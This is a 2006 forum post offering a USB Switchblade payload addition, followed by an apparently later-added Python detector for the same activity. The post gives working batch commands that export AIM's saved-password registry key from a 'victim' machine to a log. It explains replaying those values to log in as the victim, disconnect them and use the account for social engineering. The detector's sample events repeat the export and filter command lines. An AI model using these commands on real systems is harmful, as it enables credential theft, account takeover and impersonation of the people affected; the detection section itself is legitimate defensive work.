AndyzBong
Posted December 29, 2006

Now before I continue... I know I am going to get flamed for this payload addition, but I think it is kind of an important addition due to some inabilities in the program MessenPass.

MessenPass is the MSN, AIM, etc password decrypter / stealer that is currently used in the USB Switchblade. However, the Mspass program only works for versions of AIM 5.5 (as far as I am aware of) and not versions of AIM 5.9.

AIM 5.9 and higher versions use a more potent password algorithm, and have yet to be decrypted. By adding the following code to your go.cmd file, you can extract the encrypted passwords from the 'victim' computer.

@echo [AIM 5.9 Encrypted Password Extract] >> Documentslogfiles%computername%.log 2>&1
echo. >> Documentslogfiles%computername%.log 2>&1
regedit.exe /E Documentslogfilesaimdump.reg "HKEY_CURRENT_USERSOFTWAREAmerica OnlineAOL Instant Messenger (tM)CurrentVersionusers"
TYPE Documentslogfilesaimdump.reg | find "Password1" >> Documentslogfiles%computername%.log
echo. >> Documentslogfiles%computername%.log 2>&1
@echo [End AIM 5.9 Encrypted Password Extract] >> Documentslogfiles%computername%.log 2>&1

After extracting the encrypted password registry values you can import the information remotely into your own registry and sign-on as the victim's AIM screen name; just as if they had entered their password at your computer and clicked on the "Save Password" check box.

Unfortunately you cannot change the password. However, you can login as the 'victim', and you can disconnect them; when the AOL System IMs you and asks you to "Press 1 to disconnect your other connection". So it is basically a pretty lame DoS attack. You could also use this for social engineering.

If anyone wants to criticize my lame code, please go ahead and post a cleaner way of doing this. :?
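
From the defender's side, the two steps in the post (a registry export of the AIM key, then filtering the dump for `Password1`) show up in process-creation logs. The following is an added example, not part of the original post: the `(host, command line)` event format, the host names and the sample lines are constructed, the key path separators in the samples are assumed, and the `reg export` variant generalizes beyond the post's `regedit /E`.

```python
import re

# Export switch: "regedit /E <file> <key>" (as in the post) or "reg export <key> <file>".
EXPORT_RE = re.compile(
    r'(?i)\b(?:regedit(?:\.exe)?"?\s+(?:/s\s+)?/e\b|reg(?:\.exe)?"?\s+export\b)')
# Key fragment quoted in the post; matched as a substring so the hive spelling does not matter.
AIM_KEY_RE = re.compile(r'(?i)AOL Instant Messenger')
# Follow-up step in the post: filtering the dump for the saved-password value name.
VALUE_RE = re.compile(r'(?i)\bfind(?:str)?(?:\.exe)?\b.*Password1')

def classify(cmdline):
    """Return 'export', 'filter' or None for one process command line."""
    if EXPORT_RE.search(cmdline) and AIM_KEY_RE.search(cmdline):
        return "export"
    if VALUE_RE.search(cmdline):
        return "filter"
    return None

def detect(events):
    """events: iterable of (host, cmdline). Return {host: sorted stages seen}."""
    hits = {}
    for host, cmdline in events:
        stage = classify(cmdline)
        if stage:
            hits.setdefault(host, set()).add(stage)
    return {host: sorted(stages) for host, stages in hits.items()}

# Constructed sample events (hypothetical hosts and paths, not taken from real logs).
SAMPLE_EVENTS = [
    ("WS-017", r'regedit.exe /E E:\logs\aimdump.reg '
               r'"HKCU\Software\America Online\AOL Instant Messenger (TM)"'),
    ("WS-017", r'cmd.exe /c TYPE E:\logs\aimdump.reg | find "Password1"'),
    # Benign export of an unrelated key: must not alert.
    ("WS-022", r'regedit.exe /E C:\backup\app.reg "HKCU\Software\ExampleApp"'),
    ("WS-031", r'reg.exe export '
               r'"HKCU\Software\America Online\AOL Instant Messenger (TM)" C:\Temp\a.reg'),
]

if __name__ == "__main__":
    for host, stages in detect(SAMPLE_EVENTS).items():
        print(host, stages)
```

A host showing both stages is the stronger signal; the `filter` stage alone matches any search for `Password1` and is best treated as supporting evidence.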